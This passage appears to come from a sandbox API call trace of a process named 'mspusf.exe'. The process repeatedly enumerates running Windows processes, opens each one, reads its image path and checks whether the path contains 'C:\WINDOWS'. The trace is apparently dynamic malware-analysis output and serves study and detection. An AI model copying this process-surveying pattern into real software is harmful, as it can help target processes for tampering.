ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.425] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x708) returned 0xa80 [0101.425] GetModuleFileNameExW (in: hProcess=0xa80, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\sihost.exe" (normalized: "c:\\windows\\system32\\sihost.exe")) returned 0x1e [0101.425] StrStrIW (lpFirst="C:\\Windows\\System32\\sihost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\sihost.exe" [0101.425] CloseHandle (hObject=0xa80) returned 1 [0101.425] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.425] GetCurrentProcessId () returned 0xf00 [0101.425] GetCurrentProcess () returned 0xffffffff [0101.425] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.426] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x720) returned 0xa80 [0101.426] GetModuleFileNameExW (in: hProcess=0xa80, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0101.426] StrStrIW (lpFirst="C:\\Windows\\System32\\svchost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\svchost.exe" [0101.426] CloseHandle (hObject=0xa80) returned 1 [0101.426] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0101.426] GetCurrentProcessId () returned 0xf00 [0101.426] GetCurrentProcess () returned 0xffffffff [0101.426] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.426] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x7a0) returned 0xa80 [0101.426] GetModuleFileNameExW (in: hProcess=0xa80, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")) returned 0x21 [0101.427] StrStrIW (lpFirst="C:\\Windows\\System32\\taskhostw.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\taskhostw.exe" [0101.427] CloseHandle (hObject=0xa80) returned 1 [0101.427] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0101.427] GetCurrentProcessId () returned 0xf00 [0101.427] GetCurrentProcess () returned 0xffffffff [0101.427] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.427] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0101.428] GetCurrentProcessId () returned 0xf00 [0101.428] GetCurrentProcess () returned 0xffffffff [0101.428] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.428] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x818) returned 0x0 [0101.428] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0101.428] GetCurrentProcessId () returned 0xf00 [0101.428] GetCurrentProcess () returned 0xffffffff [0101.428] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.428] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x84c) returned 0x0 [0101.428] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0101.429] GetCurrentProcessId () returned 0xf00 [0101.429] GetCurrentProcess () returned 0xffffffff [0101.429] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.429] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x8a0) returned 0x0 [0101.429] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0101.430] GetCurrentProcessId () returned 0xf00 [0101.430] GetCurrentProcess () returned 0xffffffff [0101.430] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.430] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xb3c) returned 0xa80 [0101.430] GetModuleFileNameExW (in: hProcess=0xa80, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe" (normalized: "c:\\windows\\systemapps\\shellexperiencehost_cw5n1h2txyewy\\shellexperiencehost.exe")) returned 0x4f [0101.430] StrStrIW (lpFirst="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe" [0101.430] CloseHandle (hObject=0xa80) returned 1 [0101.430] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0101.430] GetCurrentProcessId () returned 0xf00 [0101.430] GetCurrentProcess () returned 0xffffffff [0101.430] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.430] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xb60) returned 0xa80 [0101.431] GetModuleFileNameExW (in: hProcess=0xa80, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe" (normalized: "c:\\windows\\systemapps\\microsoft.windows.cortana_cw5n1h2txyewy\\searchui.exe")) returned 0x4a [0101.431] StrStrIW (lpFirst="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe" [0101.431] CloseHandle (hObject=0xa80) returned 1 [0101.431] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0101.431] GetCurrentProcessId () returned 0xf00 [0101.431] GetCurrentProcess () returned 0xffffffff [0101.431] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.431] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xbe4) returned 0xa80 [0101.431] GetModuleFileNameExW (in: hProcess=0xa80, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\RuntimeBroker.exe" (normalized: "c:\\windows\\system32\\runtimebroker.exe")) returned 0x25 [0101.432] StrStrIW (lpFirst="C:\\Windows\\System32\\RuntimeBroker.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\RuntimeBroker.exe" [0101.432] CloseHandle (hObject=0xa80) returned 1 [0101.432] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0101.432] GetCurrentProcessId () returned 0xf00 [0101.432] GetCurrentProcess () returned 0xffffffff [0101.432] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.432] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xe0c) returned 0x0 [0101.432] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0101.433] GetCurrentProcessId () returned 0xf00 [0101.433] GetCurrentProcess () returned 0xffffffff [0101.433] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.433] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1168) returned 0x0 [0101.433] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.433] GetCurrentProcessId () returned 0xf00 [0101.433] GetCurrentProcess () returned 0xffffffff [0101.433] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.433] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1240) returned 0x0 [0101.433] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0101.509] GetCurrentProcessId () returned 0xf00 [0101.509] GetCurrentProcess () returned 0xffffffff [0101.509] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.509] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x12d4) returned 0xa80 [0101.509] GetModuleFileNameExW (in: hProcess=0xa80, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")) returned 0x21 [0101.510] StrStrIW (lpFirst="C:\\Windows\\System32\\taskhostw.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\taskhostw.exe" [0101.510] CloseHandle (hObject=0xa80) returned 1 [0101.510] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0101.510] GetCurrentProcessId () returned 0xf00 [0101.510] GetCurrentProcess () returned 0xffffffff [0101.510] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.510] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x130c) returned 0x0 [0101.510] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x135c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x130c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.511] GetCurrentProcessId () returned 0xf00 [0101.511] GetCurrentProcess () returned 0xffffffff [0101.511] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.511] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x135c) returned 0x0 [0101.511] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mspusf.exe")) returned 1 [0101.511] GetCurrentProcessId () returned 0xf00 [0101.511] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.512] GetCurrentProcessId () returned 0xf00 [0101.512] GetCurrentProcess () returned 0xffffffff [0101.512] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.512] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x704) returned 0xa80 [0101.512] GetModuleFileNameExW (in: hProcess=0xa80, hModule=0x0, lpFilename=0x7a9f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")) returned 0x1f [0101.513] StrStrIW (lpFirst="C:\\Windows\\System32\\conhost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\conhost.exe" [0101.513] CloseHandle (hObject=0xa80) returned 1 [0101.513] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0101.513] GetCurrentProcessId () returned 0xf00 [0101.513] GetCurrentProcess () returned 0xffffffff [0101.513] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.513] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xafc) returned 0x0 [0101.513] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0101.514] GetCurrentProcessId () returned 0xf00 [0101.514] GetCurrentProcess () returned 0xffffffff [0101.514] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.514] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xf24) returned 0x0 [0101.514] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0101.514] GetCurrentProcessId () returned 0xf00 [0101.514] GetCurrentProcess () returned 0xffffffff [0101.514] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.514] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x6ec) returned 0x0 [0101.514] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0101.515] GetCurrentProcessId () returned 0xf00 [0101.515] GetCurrentProcess () returned 0xffffffff [0101.515] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0101.515] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1234) returned 0x0 [0101.515] Process32NextW (in: hSnapshot=0xa84, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 0 [0101.515] CloseHandle (hObject=0xa84) returned 1 [0101.516] Sleep (dwMilliseconds=0x3a98) [0113.788] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4c8 [0113.939] Process32FirstW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.939] GetCurrentProcessId () returned 0xf00 [0113.939] GetCurrentProcess () returned 0xffffffff [0113.939] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.939] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0113.939] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0113.940] GetCurrentProcessId () returned 0xf00 [0113.940] GetCurrentProcess () returned 0xffffffff [0113.940] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.940] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0113.940] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0113.941] GetCurrentProcessId () returned 0xf00 [0113.941] GetCurrentProcess () returned 0xffffffff [0113.941] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.941] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x140) returned 0x0 [0113.941] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0113.941] GetCurrentProcessId () returned 0xf00 [0113.941] GetCurrentProcess () returned 0xffffffff [0113.941] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.941] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x198) returned 0x0 [0113.941] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0113.942] GetCurrentProcessId () returned 0xf00 [0113.942] GetCurrentProcess () returned 0xffffffff [0113.942] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.942] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0113.942] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0113.942] GetCurrentProcessId () returned 0xf00 [0113.942] GetCurrentProcess () returned 0xffffffff [0113.942] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.943] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0113.943] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0113.955] GetCurrentProcessId () returned 0xf00 [0113.956] GetCurrentProcess () returned 0xffffffff [0113.956] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.956] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x220) returned 0x0 [0113.956] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0113.956] GetCurrentProcessId () returned 0xf00 [0113.956] GetCurrentProcess () returned 0xffffffff [0113.956] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x7a9fa4c, ProcessInformationLength=0x18, ReturnLength=0x7a9fa64 | out: ProcessInformation=0x7a9fa4c, ReturnLength=0x7a9fa64) returned 0x0 [0113.956] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0113.956] Process32NextW (in: hSnapshot=0x4c8, lppe=0x7a9f820 | out: lppe=0x7a9f820*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0113.957] GetCurrentProcessId () returned 0xf00 [0113.957] GetCurrentProcess () returned 0xffffffff 